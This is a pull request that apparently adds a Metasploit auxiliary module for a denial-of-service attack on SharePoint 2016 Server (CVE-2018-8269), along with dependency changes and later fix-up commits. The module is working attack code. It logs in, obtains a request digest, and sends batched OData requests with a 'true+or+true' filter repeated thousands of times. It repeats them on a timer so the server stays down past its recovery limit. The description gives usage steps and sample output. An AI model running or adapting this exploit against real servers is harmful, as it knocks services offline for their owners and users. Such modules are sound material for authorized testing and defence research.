### PR TITLE
Microsoft SharePoint 2016 DOS - CVE-2018-8269

### DIFF
--- a/.travis.yml
+++ b/.travis.yml
@@ -9,6 +9,7 @@ addons:
     packages:
       - libpcap-dev
       - graphviz
+      - libcurl4-gnutls-dev
 language: ruby
 rvm:
   - '2.3.8'

--- a/Dockerfile
+++ b/Dockerfile
@@ -15,6 +15,7 @@ RUN apk add --no-cache \
       autoconf \
       bison \
       build-base \
+      curl-dev \
       ruby-dev \
       libressl-dev \
       readline-dev \

--- a/Gemfile.lock
+++ b/Gemfile.lock
@@ -65,6 +65,7 @@ PATH
       ruby_smb
       rubyntlm
       rubyzip
+      sharepoint-ruby (= 0.0.2)
       sinatra
       sqlite3
       sshkey
@@ -121,6 +122,7 @@ GEM
     concurrent-ruby (1.0.5)
     cookiejar (0.3.3)
     crass (1.0.4)
+    curb (0.8.6)
     daemons (1.3.1)
     diff-lcs (1.3)
     dnsruby (1.61.2)
@@ -329,6 +331,8 @@ GEM
     sawyer (0.8.1)
       addressable (>= 2.3.5, < 2.6)
       faraday (~> 0.8, < 1.0)
+    sharepoint-ruby (0.0.2)
+      curb (~> 0.8, <= 0.8.6)
     simplecov (0.16.1)
       docile (~> 1.1)
       json (>= 1.8, < 3)

--- a/Vagrantfile
+++ b/Vagrantfile
@@ -23,7 +23,7 @@ Vagrant.configure(2) do |config|
   [ #"echo 127.0.1.1 `cat /etc/hostname` >> /etc/hosts", work around a bug in official Ubuntu Xenial cloud images
     "apt-get update",
     "apt-get dist-upgrade -y",
-    "apt-get -y install curl build-essential git tig vim john nmap libpq-dev libpcap-dev gnupg2 fortune postgresql postgresql-contrib",
+    "apt-get -y install curl build-essential git tig vim john nmap libpq-deva libcurl4-gnutls-dev libpcap-dev gnupg2 fortune postgresql postgresql-contrib",
   ].each do |step|
     config.vm.provision "shell", inline: step
   end

--- a/metasploit-framework.gemspec
+++ b/metasploit-framework.gemspec
@@ -182,6 +182,8 @@ Gem::Specification.new do |spec|
   spec.add_runtime_dependency 'rubyzip'
   # Needed for some post modules
   spec.add_runtime_dependency 'sqlite3'
+  # Needed for Microsoft SharePoint intraction
+  spec.add_runtime_dependency 'sharepoint-ruby',"0.0.2"
   # required for Time::TZInfo in ActiveSupport
   spec.add_runtime_dependency 'tzinfo'
   # Needed so that disk size output isn't horrible

--- a/modules/auxiliary/dos/windows/http/sp16_dos.rb
+++ b/modules/auxiliary/dos/windows/http/sp16_dos.rb
@@ -1,0 +1,150 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+require 'sharepoint-ruby'
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Exploit::Remote::Tcp
+  include Msf::Auxiliary::Dos
+  include Msf::Exploit::Remote::HttpClient
+
+
+  def initialize(info = {})
+    super(update_info(info,
+        'Name'        => 'DOS Expoit in SharePoint 2016 Server',
+        'Description'    => %q{
+          A vulnerability in Microsoft SharePoint Server could allow a remote attacker to make the server unavailable.
+          The vulnerability is a result of the dependency SharePoint has in Microsoft.Data. OData library which was
+          vulnerable to remote DOS (See CVE-2018-8269). The exploit is done by sending a crafted request that contains
+          an OData filter that triggers the vulnerability in Microsoft.Data.OData library. Sending such request, will
+          terminate the process that runs the server. By default, SharePoint server is configured to recover a
+          terminated process, but it will do so only 10 times. If more than 10 malicious requests are sent in 5 minutes
+           interval, the server will not recover and will be down until it is manually restarted.
+      },
+      'Author'         =>
+        [
+          'Gil Mirmovitch', # Vulnerability discover and poc
+          'Gal Zror'        # Metasploit module
+        ],
+      'Platform'    => 'win',
+      'References'     =>
+          [
+              [ 'CVE', '2018-8269' ],
+              [ 'ALEPH', '2018002' ]
+          ],
+      'Targets'     =>
+          [
+              [ 'Microsoft Office SharePoint Server 2016', { } ],
+          ],
+          ))
+
+    register_options(
+      [
+        Opt::RPORT(443),
+        OptString.new('SSL',  [true, 'Negotiate SSL/TLS for outgoing connections', true]),
+        OptString.new('USERNAME',  [true, 'The username to login with']),
+        OptString.new('PASSWORD',  [true, 'The password to login with']),
+        OptString.new('VHOST',  [true, 'HTTP server virtual host'])
+      ], self.class)
+  end
+
+  def fetch_auth_cookie
+    print_status("Fetching Authentication Cookie")
+    begin
+      site = Sharepoint::Site.new vhost, 'server-relative-site-url'
+      site.session.authenticate datastore['USERNAME'], datastore['PASSWORD']
+      return site.session.cookie
+    rescue Sharepoint::Session::AuthenticationFailed
+      fail_with(Failure::NoAccess, "Authentication failed")
+    end
+    print_good("Authentication Succeeded")
+  end
+
+  def extract_digest_value(cookie)
+    token_api_uri = '/_api/contextinfo'
+    res = send_request_cgi( {
+                                'method' => 'POST',
+                                'uri' => normalize_uri(token_api_uri),
+                                'cookie' => cookie,
+                            })
+    if res&get_xml_document.nil?
+      fail_with(Failure::UnexpectedReply, "Empty context response")
+    end
+    res.get_xml_document.xpath('//d:FormDigestValue').text
+  end
+
+  def send_dos_request
+    send_request(6100)
+  end
+
+  def send_innocent_request
+    send_request(5)
+  end
+
+  def send_request(reps)
+    batch_uri = "/_api/$batch"
+    cookie = datastore['COOKIE']
+
+    data = Rex::MIME::Message.new
+    data.add_part(
+        "GET /_api/web/lists?$filter=true" + "+or+true" * reps + " HTTP/1.1\r\n" +
+            "accept: application/json;odata.metadata=minimal\r\n", #Data is our payload
+        'application/http',                                       #Content Type
+        'binary',                                                 #Transfer Encoding
+        nil                                                       #Content Disposition
+    )
+    send_request_cgi({
+                           'method'   => 'POST',
+                           'uri'      => normalize_uri(batch_uri),
+                           'ctype'  => "multipart/mixed; boundary=#{data.bound}",
+                           'data'   => data.to_s,
+                           'cookie' => cookie,
+                           'headers'      => {
+                               'x-requestdigest'	=> extract_digest_value(cookie),
+                           }
+
+                       })
+  end
+
+  def dos
+    print_status("Sending DOS malicious requests...")
+    (0..10).each {|i|
+      print_status("Countdown #{10 - i}...")
+      send_innocent_request #TODO change this
+      sleep(60)
+    }
+
+  end
+
+  def check
+    datastore['COOKIE'] = fetch_auth_cookie
+
+    print_status("Sending innocent request...")
+    res = send_innocent_request
+
+    if res&.code.nil? && res.code == 200
+      print_good("Server responded 200 to innocent request")
+    else
+      print_bad("Server response " + res.code.to_s + " to innocent request")
+      return Exploit::CheckCode::Unknown
+    end
+
+    print_status("Sending malicious request...")
+    res = send_dos_request
+
+    if res&.code.nil?
+      Exploit::CheckCode::Vulnerable
+    else
+      print_bad("Server response " + res.code.to_s + " to malicious request")
+      Exploit::CheckCode::Safe
+    end
+  end
+
+  def run
+    if check == Exploit::CheckCode::Vulnerable
+      dos
+    end
+  end
+end
+

--- a/modules/auxiliary/dos/windows/http/sp16_dos.rb
+++ b/modules/auxiliary/dos/windows/http/sp16_dos.rb
@@ -12,15 +12,15 @@ class MetasploitModule < Msf::Auxiliary
 
   def initialize(info = {})
     super(update_info(info,
-        'Name'        => 'DOS Expoit in SharePoint 2016 Server',
+        'Name'        => 'DOS Vulnerability in SharePoint 2016 Server',
         'Description'    => %q{
           A vulnerability in Microsoft SharePoint Server could allow a remote attacker to make the server unavailable.
-          The vulnerability is a result of the dependency SharePoint has in Microsoft.Data. OData library which was
+          The vulnerability is a result of the dependency SharePoint has in Microsoft.Data.OData library which was 
           vulnerable to remote DOS (See CVE-2018-8269). The exploit is done by sending a crafted request that contains
           an OData filter that triggers the vulnerability in Microsoft.Data.OData library. Sending such request, will
           terminate the process that runs the server. By default, SharePoint server is configured to recover a
-          terminated process, but it will do so only 10 times. If more than 10 malicious requests are sent in 5 minutes
-           interval, the server will not recover and will be down until it is manually restarted.
+          terminated process, but it will do so only 10 times. If more than 10 malicious requests are sent in 5
+          minutes interval, the server will not recover and will be down until it is manually restarted.
       },
       'Author'         =>
         [
@@ -37,6 +37,7 @@ class MetasploitModule < Msf::Auxiliary
           [
               [ 'Microsoft Office SharePoint Server 2016', { } ],
           ],
+
           ))
 
     register_options(
@@ -47,6 +48,7 @@ class MetasploitModule < Msf::Auxiliary
         OptString.new('PASSWORD',  [true, 'The password to login with']),
         OptString.new('VHOST',  [true, 'HTTP server virtual host'])
       ], self.class)
+      
   end
 
   def fetch_auth_cookie
@@ -68,7 +70,7 @@ class MetasploitModule < Msf::Auxiliary
                                 'uri' => normalize_uri(token_api_uri),
                                 'cookie' => cookie,
                             })
-    if res&get_xml_document.nil?
+    if res.nil?
       fail_with(Failure::UnexpectedReply, "Empty context response")
     end
     res.get_xml_document.xpath('//d:FormDigestValue').text
@@ -83,7 +85,7 @@ class MetasploitModule < Msf::Auxiliary
   end
 
   def send_request(reps)
-    batch_uri = "/_api/$batch"
+    vuln_api_uri = "/_api/$batch"
     cookie = datastore['COOKIE']
 
     data = Rex::MIME::Message.new
@@ -96,7 +98,7 @@ class MetasploitModule < Msf::Auxiliary
     )
     send_request_cgi({
                            'method'   => 'POST',
-                           'uri'      => normalize_uri(batch_uri),
+                           'uri'      => normalize_uri(vuln_api_uri),
                            'ctype'  => "multipart/mixed; boundary=#{data.bound}",
                            'data'   => data.to_s,
                            'cookie' => cookie,
@@ -111,7 +113,7 @@ class MetasploitModule < Msf::Auxiliary
     print_status("Sending DOS malicious requests...")
     (0..10).each {|i|
       print_status("Countdown #{10 - i}...")
-      send_innocent_request #TODO change this
+      send_dos_request
       sleep(60)
     }
 
@@ -123,7 +125,7 @@ class MetasploitModule < Msf::Auxiliary
     print_status("Sending innocent request...")
     res = send_innocent_request
 
-    if res&.code.nil? && res.code == 200
+    if res && res.code == 200
       print_good("Server responded 200 to innocent request")
     else
       print_bad("Server response " + res.code.to_s + " to innocent request")
@@ -133,7 +135,7 @@ class MetasploitModule < Msf::Auxiliary
     print_status("Sending malicious request...")
     res = send_dos_request
 
-    if res&.code.nil?
+    if res.nil?
       Exploit::CheckCode::Vulnerable
     else
       print_bad("Server response " + res.code.to_s + " to malicious request")

--- a/modules/auxiliary/dos/windows/http/sp16_dos.rb
+++ b/modules/auxiliary/dos/windows/http/sp16_dos.rb
@@ -15,7 +15,7 @@ class MetasploitModule < Msf::Auxiliary
         'Name'        => 'DOS Vulnerability in SharePoint 2016 Server',
         'Description'    => %q{
           A vulnerability in Microsoft SharePoint Server could allow a remote attacker to make the server unavailable.
-          The vulnerability is a result of the dependency SharePoint has in Microsoft.Data.OData library which was 
+          The vulnerability is a result of the dependency SharePoint has in Microsoft.Data.OData library which was
           vulnerable to remote DOS (See CVE-2018-8269). The exploit is done by sending a crafted request that contains
           an OData filter that triggers the vulnerability in Microsoft.Data.OData library. Sending such request, will
           terminate the process that runs the server. By default, SharePoint server is configured to recover a
@@ -47,8 +47,7 @@ class MetasploitModule < Msf::Auxiliary
         OptString.new('USERNAME',  [true, 'The username to login with']),
         OptString.new('PASSWORD',  [true, 'The password to login with']),
         OptString.new('VHOST',  [true, 'HTTP server virtual host'])
-      ], self.class)
-      
+      ])
   end
 
   def fetch_auth_cookie
@@ -149,4 +148,3 @@ class MetasploitModule < Msf::Auxiliary
     end
   end
 end
-


### PR DESCRIPTION
This is a DOS exploitation for Microsoft SharePoint 2016 Server according to a research done by Aleph Security Team by HCL technologies (CVE-2018-8269). More details can be found here: 
https://alephsecurity.com/2018/10/22/StackOverflowException/

## Verification

1.Start `msfconsole`
2.`use auxiliary/dos/windows/http/sp16_dos`
3.`set VHOST victim.sharepoint.com` and `set RHOSTS victim.sharepoint.com`
4. if needed by Server `set USERNAME evil` and `set PASSWORD p@ssword`
5. `check` checks if server is vulnerable and should not crush the server. 
6. `run` - use with CATION. this will crush the IIS server when countdown reaches 1.

## Scenarios
```
msf5 auxiliary(dos/windows/http/sp16_dos) > check

[*] 13.13.13.13:443 - Fetching Authentication Cookie
[*] 13.13.13.13:443 - Sending innocent request...
[+] 13.13.13.13:443 - Server responded 200 to innocent request
[*] 13.13.13.13:443 - Sending malicious request...
[+] 13.13.13.13:443 - The target is vulnerable.

----------------------------------
msf5 auxiliary(dos/windows/http/sp16_dos) > run

[*] test.sharepoint.com:443 - Fetching Authentication Cookie
[*] test.sharepoint.com:443 - Sending innocent request...
[+] test.sharepoint.com:443 - Server responded 200 to innocent request
[*] test.sharepoint.com:443 - Sending malicious request...
[*] test.sharepoint.com:443 - Sending DOS malicious requests...
[*] test.sharepoint.com:443 - Countdown 10...
[*] test.sharepoint.com:443 - Countdown 9...
[*] test.sharepoint.com:443 - Countdown 8...
....
[*] test.sharepoint.com:443 - Countdown 1...

```
